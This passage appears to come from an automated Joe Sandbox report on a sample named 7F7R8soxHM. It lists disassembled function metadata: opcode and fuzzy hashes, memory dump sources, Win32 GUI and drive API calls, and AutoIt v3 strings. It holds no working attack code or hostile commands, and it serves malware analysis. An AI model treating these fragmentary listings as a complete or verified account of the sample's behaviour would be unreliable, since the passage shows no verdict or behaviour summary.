                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 124fb7860383ab9eec92f87f9f6703f2ab43a9454e3fcb34ad8898827005389c
                      • Instruction ID: 1f9c3f10f852df1f88d0ed1adfc12f82930bdeefd2846c1a424a7026e4cd9cfc
                      • Opcode Fuzzy Hash: 124fb7860383ab9eec92f87f9f6703f2ab43a9454e3fcb34ad8898827005389c
                      • Instruction Fuzzy Hash: 5B224B31501615CBCF38AB14C684BBDB7A1EB41308FA8646EDC4EBB195DB35ADC2CB61
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                      • Instruction ID: cdf395f0c1bb5cc714151f374cff440326fa30ad45b97363a6244af8b6158689
                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                      • Instruction Fuzzy Hash: 45C1C5322051930ADF2D8639D43407EFBE15EA27B531A279EE4B3EB5C5EF20D524E620
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                      • Instruction ID: c2d1b590c332fab5f15ebc501592d3e6ae7e0c71fc16d94daca16b6f8737eba6
                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                      • Instruction Fuzzy Hash: F4C182332051930ADF6D463AD43413EBBE15FA27B531A27ADE4B2EB5D4EF20D524E620
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                      • Instruction ID: 5a759a86e6c4a3628fca9058091bb28e7fdeac0a9a4de2790891e426344af8ca
                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                      • Instruction Fuzzy Hash: 3FC1833630919309DF2D463A943407EFAE15EA27B531A27EDE4B3EB5D4EF20D524D610
                      Memory Dump Source
                      • Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                      • Instruction ID: ee13be8ebfbad49a70fec399e5d1d604a263793dc8bcaf37c84a5e726a1a6c49
                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                      • Instruction Fuzzy Hash: 5141C471D1051CDBCF48CFADC991AAEFBF1AF88201F548299D516AB345D730AB41DB40
                      Memory Dump Source
                      • Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                      • Instruction ID: bca014c41c14f7d17392e8fb09402dc1d232a8cc7ddf922e9bfef63849fcc122
                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                      • Instruction Fuzzy Hash: A4019278A01109EFCB48DFA9C5909AEF7B5FB48720F208599D909A7305D730AE41DB80
                      Memory Dump Source
                      • Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                      • Instruction ID: acc0558d949c7729ad96f025fb3b56cdb27bd6592564f2cd376e59c9a4facafc
                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                      • Instruction Fuzzy Hash: BC01A478A14109EFCB44DFA8C5909AEFBF5FF48320F208699D819A7305D730AE41DB90
                      Memory Dump Source
                      • Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                      APIs
                      • CharUpperBuffW.USER32(?,?,00EFF910), ref: 00EF38AF
                      • IsWindowVisible.USER32(?), ref: 00EF38D3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: BuffCharUpperVisibleWindow
                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                      • API String ID: 4105515805-45149045
                      • Opcode ID: c36958b4434fcaa09ec3676a92ce867188b62a5dba3277185b5af4da570698f6
                      • Instruction ID: 638ca269279c19235862ab94c55b953870d75bffe19faef8f61d628f382ef0c0
                      • Opcode Fuzzy Hash: c36958b4434fcaa09ec3676a92ce867188b62a5dba3277185b5af4da570698f6
                      • Instruction Fuzzy Hash: B9D17F302043099FCB14EF24C551ABAB7E1AF94354F11A45CB9867B3A3CB31EE4ACB91
                      APIs
                      • SetTextColor.GDI32(?,00000000), ref: 00EFA89F
                      • GetSysColorBrush.USER32(0000000F), ref: 00EFA8D0
                      • GetSysColor.USER32(0000000F), ref: 00EFA8DC
                      • SetBkColor.GDI32(?,000000FF), ref: 00EFA8F6
                      • SelectObject.GDI32(?,?), ref: 00EFA905
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00EFA930
                      • GetSysColor.USER32(00000010), ref: 00EFA938
                      • CreateSolidBrush.GDI32(00000000), ref: 00EFA93F
                      • FrameRect.USER32(?,?,00000000), ref: 00EFA94E
                      • DeleteObject.GDI32(00000000), ref: 00EFA955
                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00EFA9A0
                      • FillRect.USER32(?,?,?), ref: 00EFA9D2
                      • GetWindowLongW.USER32(?,000000F0), ref: 00EFA9FD
                        • Part of subcall function 00EFAB60: GetSysColor.USER32(00000012), ref: 00EFAB99
                        • Part of subcall function 00EFAB60: SetTextColor.GDI32(?,?), ref: 00EFAB9D
                        • Part of subcall function 00EFAB60: GetSysColorBrush.USER32(0000000F), ref: 00EFABB3
                        • Part of subcall function 00EFAB60: GetSysColor.USER32(0000000F), ref: 00EFABBE
                        • Part of subcall function 00EFAB60: GetSysColor.USER32(00000011), ref: 00EFABDB
                        • Part of subcall function 00EFAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EFABE9
                        • Part of subcall function 00EFAB60: SelectObject.GDI32(?,00000000), ref: 00EFABFA
                        • Part of subcall function 00EFAB60: SetBkColor.GDI32(?,00000000), ref: 00EFAC03
                        • Part of subcall function 00EFAB60: SelectObject.GDI32(?,?), ref: 00EFAC10
                        • Part of subcall function 00EFAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00EFAC2F
                        • Part of subcall function 00EFAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EFAC46
                        • Part of subcall function 00EFAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00EFAC5B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                      • String ID:
                      • API String ID: 4124339563-0
                      • Opcode ID: 5c4bb1336ddb50bd15326e5595bffc80670097deb71d671cf20fac3259db0d34
                      • Instruction ID: 3a1106b629c837409487dfb53a1e7c769e8206ff4a5500ac41f83faf99fd8574
                      • Opcode Fuzzy Hash: 5c4bb1336ddb50bd15326e5595bffc80670097deb71d671cf20fac3259db0d34
                      • Instruction Fuzzy Hash: 1FA1B1B1008305BFD7109F65DC08E7B7BA9FF88321F145A39FA66AA1A1C771D948CB52
                      APIs
                      • DestroyWindow.USER32(?,?,?), ref: 00E72CA2
                      • DeleteObject.GDI32(00000000), ref: 00E72CE8
                      • DeleteObject.GDI32(00000000), ref: 00E72CF3
                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00E72CFE
                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00E72D09
                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00EAC68B
                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00EAC6C4
                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00EACAED
                        • Part of subcall function 00E71B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E72036,?,00000000,?,?,?,?,00E716CB,00000000,?), ref: 00E71B9A
                      • SendMessageW.USER32(?,00001053), ref: 00EACB2A
                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00EACB41
                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00EACB57
                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00EACB62
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                      • String ID: 0
                      • API String ID: 464785882-4108050209
                      • Opcode ID: 13ebec404dec64f8754eec1ad3f49acc34face23d2721d20b6f9e6edbc771cc5
                      • Instruction ID: 620ec5bb11378ba942a3253c1e57b55f6bd382280c1a5c4df46c9b7f9cf57b0e
                      • Opcode Fuzzy Hash: 13ebec404dec64f8754eec1ad3f49acc34face23d2721d20b6f9e6edbc771cc5
                      • Instruction Fuzzy Hash: 58128E30604201AFDB15CF24C884BA9B7E5BF5A304F64A569F599EF262CB31FC45CB91
                      APIs
                      • DestroyWindow.USER32(00000000), ref: 00EE77F1
                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EE78B0
                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EE78EE
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EE7900
                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EE7946
                      • GetClientRect.USER32(00000000,?), ref: 00EE7952
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EE7996
                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EE79A5
                      • GetStockObject.GDI32(00000011), ref: 00EE79B5
                      • SelectObject.GDI32(00000000,00000000), ref: 00EE79B9
                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EE79C9
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EE79D2
                      • DeleteDC.GDI32(00000000), ref: 00EE79DB
                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EE7A07
                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EE7A1E
                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EE7A59
                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EE7A6D
                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EE7A7E
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EE7AAE
                      • GetStockObject.GDI32(00000011), ref: 00EE7AB9
                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EE7AC4
                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EE7ACE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                      • API String ID: 2910397461-517079104
                      • Opcode ID: c8c225c74f6de7e9d673556e62a53c50ff7d1a0d3abf94e709a99ebcde22e81b
                      • Instruction ID: 11188ea79987b3c9c9a048a3d9f32d6325611d48c9dcde3c899a4c7671fd876c
                      • Opcode Fuzzy Hash: c8c225c74f6de7e9d673556e62a53c50ff7d1a0d3abf94e709a99ebcde22e81b
                      • Instruction Fuzzy Hash: DEA15E71A40219BFEB149BA5DC4AFABBBA9EF44714F018114FA15F72E1CB70AD00CB64
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00EDAF89
                      • GetDriveTypeW.KERNEL32(?,00EFFAC0,?,\\.\,00EFF910), ref: 00EDB066
                      • SetErrorMode.KERNEL32(00000000,00EFFAC0,?,\\.\,00EFF910), ref: 00EDB1C4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ErrorMode$DriveType
                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                      • API String ID: 2907320926-4222207086
                      • Opcode ID: 3cb6ea0ff5fdd1988078eea63d38b3f5b312325f7476ee487d7d7c9fc84532af
                      • Instruction ID: 65a78e193a0ee5258c96033ad28b8c2ceec99dda9b43869f9894141a9691071e
                      • Opcode Fuzzy Hash: 3cb6ea0ff5fdd1988078eea63d38b3f5b312325f7476ee487d7d7c9fc84532af
                      • Instruction Fuzzy Hash: 82519C30681305EB8B04DB10D9A29BD73B1EF54745B22A027E41AB7391E775DD43EB47
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                      • API String ID: 1038674560-86951937
                      • Opcode ID: ad5b7ed146930adbf73c42e3c2519ab8f2e39d4e27e4636a7b6c10b64972ccd3
                      • Instruction ID: c7fd92bc4d8ac36823d0af26b9473712d7ef930e4998d25e30f5cb65a04d9c33
                      • Opcode Fuzzy Hash: ad5b7ed146930adbf73c42e3c2519ab8f2e39d4e27e4636a7b6c10b64972ccd3
                      • Instruction Fuzzy Hash: 50812B71600705BBCF21AF70CC82FAE77D8AF16708F04A025FD49BA1C6EB61EA55D261
                      APIs
                      • GetSysColor.USER32(00000012), ref: 00EFAB99
                      • SetTextColor.GDI32(?,?), ref: 00EFAB9D
                      • GetSysColorBrush.USER32(0000000F), ref: 00EFABB3
                      • GetSysColor.USER32(0000000F), ref: 00EFABBE
                      • CreateSolidBrush.GDI32(?), ref: 00EFABC3
                      • GetSysColor.USER32(00000011), ref: 00EFABDB
                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EFABE9
                      • SelectObject.GDI32(?,00000000), ref: 00EFABFA
                      • SetBkColor.GDI32(?,00000000), ref: 00EFAC03
                      • SelectObject.GDI32(?,?), ref: 00EFAC10
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00EFAC2F
                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EFAC46
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00EFAC5B
                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EFACA7
                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EFACCE
                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00EFACEC
                      • DrawFocusRect.USER32(?,?), ref: 00EFACF7
                      • GetSysColor.USER32(00000011), ref: 00EFAD05
                      • SetTextColor.GDI32(?,00000000), ref: 00EFAD0D
                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00EFAD21
                      • SelectObject.GDI32(?,00EFA869), ref: 00EFAD38
                      • DeleteObject.GDI32(?), ref: 00EFAD43
                      • SelectObject.GDI32(?,?), ref: 00EFAD49
                      • DeleteObject.GDI32(?), ref: 00EFAD4E
                      • SetTextColor.GDI32(?,?), ref: 00EFAD54
                      • SetBkColor.GDI32(?,?), ref: 00EFAD5E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                      • String ID:
                      • API String ID: 1996641542-0
                      • Opcode ID: 0e01c1907479fea9c8e26cef03deb451cf2b814b5ad5b3dec8848a7dfc5f3bcd
                      • Instruction ID: daf9e7b45ee292a82ba342a2daffc1cdd2a262fc7e16d8ef3b5c99373a402248
                      • Opcode Fuzzy Hash: 0e01c1907479fea9c8e26cef03deb451cf2b814b5ad5b3dec8848a7dfc5f3bcd
                      • Instruction Fuzzy Hash: FC616EB1901218EFDF119FA5DC48EBEBB79EF48320F148125FA15BB2A1D6719D40DB90
                      APIs
                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EF8D34
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF8D45
                      • CharNextW.USER32(0000014E), ref: 00EF8D74
                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EF8DB5
                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EF8DCB
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF8DDC
                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EF8DF9
                      • SetWindowTextW.USER32(?,0000014E), ref: 00EF8E45
                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EF8E5B
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EF8E8C
                      • _memset.LIBCMT ref: 00EF8EB1
                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EF8EFA
                      • _memset.LIBCMT ref: 00EF8F59
                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EF8F83
                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00EF8FDB
                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00EF9088
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00EF90AA
                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EF90F4
                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EF9121
                      • DrawMenuBar.USER32(?), ref: 00EF9130
                      • SetWindowTextW.USER32(?,0000014E), ref: 00EF9158
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                      • String ID: 0
                      • API String ID: 1073566785-4108050209
                      • Opcode ID: 0264a87b03992557f2c05fe4bde2c31ea146383b64268212d34a5e998956c3a0
                      • Instruction ID: 9676690ef859ff45c91d83c71706d0cb78c2f5396f17de96a927db989e492d2b
                      • Opcode Fuzzy Hash: 0264a87b03992557f2c05fe4bde2c31ea146383b64268212d34a5e998956c3a0
                      • Instruction Fuzzy Hash: A7E19D7090120DAEDF209F61CC88AFE7BB9EF05714F109169FA55BA291DB308A85DF61
                      APIs
                      • GetCursorPos.USER32(?), ref: 00EF4C51
                      • GetDesktopWindow.USER32 ref: 00EF4C66
                      • GetWindowRect.USER32(00000000), ref: 00EF4C6D
                      • GetWindowLongW.USER32(?,000000F0), ref: 00EF4CCF
                      • DestroyWindow.USER32(?), ref: 00EF4CFB
